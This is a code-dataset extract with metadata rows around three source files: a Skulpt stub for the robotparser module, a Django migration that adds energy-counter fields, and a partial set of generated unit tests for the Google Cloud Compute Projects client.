| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d8671c39972dfc377e875c6cc8ce05326db561f
| 43
|
py
|
Python
|
src/lib/robotparser.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/robotparser.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/robotparser.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("robotparser")
| 21.5
| 42
| 0.790698
| 6
| 43
| 4.833333
| 0.666667
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 43
| 1
| 43
| 43
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d86dca1e5dc79a662fcb16a40161961ab7a4260
| 10,114
|
py
|
Python
|
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | null | null | null |
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | 12
|
2015-06-02T15:27:36.000Z
|
2015-09-17T22:05:00.000Z
|
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0006_auto_20150629_1628'),
]
operations = [
migrations.AddField(
model_name='buildingcounter',
name='ape_kwh',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='14'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='co2_lt_m2',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='13'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='co2_tn',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='11'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='co2_tn_m2',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='12'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='cosf',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='10'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='euro_forecast',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='18'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='euro_m2_electricity',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='15'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='euro_m2_liquidfuel',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='16'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='euro_m2_monthly',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='17'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kw',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='9'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='1'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='2'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2_cooling',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='4'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2_heating',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='5'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2_lighting',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='3'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2_usagehours',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='8'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='kwh_m2_user',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='7'),
preserve_default=False,
),
migrations.AddField(
model_name='buildingcounter',
name='lt_m2',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='6'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='available_charging_points',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='36'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='co2_tn',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='37'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='co2_tn_user',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='38'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='euro_forecast',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='41'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='euro_m2_monthly',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='40'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='euro_user',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='39'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='kwh',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='33'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='kwh_user',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='34'),
preserve_default=False,
),
migrations.AddField(
model_name='electricvehiclecounter',
name='total_charging_points',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='35'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='ape_kwh',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='29'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='co2_lt_m2',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='28'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='co2_tn',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='26'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='co2_tn_km',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='27'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='cosf',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='24'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='euro_forecast',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='32'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='euro_line',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='30'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='euro_monthly',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='31'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='kw',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='23'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='kwh',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='19'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='kwh_km',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='22'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='kwh_light',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='21'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='kwh_line',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='20'),
preserve_default=False,
),
migrations.AddField(
model_name='streetlightingcounter',
name='operating_lights_percentage',
field=models.OneToOneField(default=0, to='myapp.Value', related_name='25'),
preserve_default=False,
),
]
| 38.750958
| 87
| 0.582262
| 937
| 10,114
| 6.090715
| 0.110993
| 0.129315
| 0.165236
| 0.193972
| 0.939548
| 0.939548
| 0.932189
| 0.932189
| 0.932189
| 0.824952
| 0
| 0.021528
| 0.297311
| 10,114
| 260
| 88
| 38.9
| 0.781483
| 0.002076
| 0
| 0.720472
| 0
| 0
| 0.172034
| 0.05827
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.019685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d918a5032aaeae6b46c566ad9d111ac5e31bbbc
| 155,961
|
py
|
Python
|
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/compute_v1/test_projects.py
|
LaudateCorpus1/python-compute
|
a36c637f153c7b4ef49bb6a78c8b09f3746e7af1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.projects import ProjectsClient
from google.cloud.compute_v1.services.projects import pagers
from google.cloud.compute_v1.services.projects import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert ProjectsClient._get_default_mtls_endpoint(None) is None
assert ProjectsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert (
ProjectsClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
ProjectsClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
ProjectsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert ProjectsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [ProjectsClient,])
def test_projects_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name", [(transports.ProjectsRestTransport, "rest"),]
)
def test_projects_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [ProjectsClient,])
def test_projects_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
def test_projects_client_get_transport_class():
transport = ProjectsClient.get_transport_class()
available_transports = [
transports.ProjectsRestTransport,
]
assert transport in available_transports
transport = ProjectsClient.get_transport_class("rest")
assert transport == transports.ProjectsRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
@mock.patch.object(
ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
def test_projects_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(ProjectsClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(ProjectsClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(ProjectsClient, transports.ProjectsRestTransport, "rest", "true"),
(ProjectsClient, transports.ProjectsRestTransport, "rest", "false"),
],
)
@mock.patch.object(
ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_projects_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [ProjectsClient])
@mock.patch.object(
ProjectsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ProjectsClient)
)
def test_projects_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
def test_projects_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ProjectsClient, transports.ProjectsRestTransport, "rest"),],
)
def test_projects_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("request_type", [compute.DisableXpnHostProjectRequest, dict,])
def test_disable_xpn_host_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.disable_xpn_host_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_disable_xpn_host_unary_rest_required_fields(
request_type=compute.DisableXpnHostProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).disable_xpn_host._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).disable_xpn_host._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.disable_xpn_host_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_disable_xpn_host_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.disable_xpn_host._get_unset_required_fields({})
assert set(unset_fields) == (set(("requestId",)) & set(("project",)))
def test_disable_xpn_host_unary_rest_bad_request(
transport: str = "rest", request_type=compute.DisableXpnHostProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.disable_xpn_host_unary(request)
def test_disable_xpn_host_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
client.disable_xpn_host_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/disableXpnHost"
% client.transport._host,
args[1],
)
def test_disable_xpn_host_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
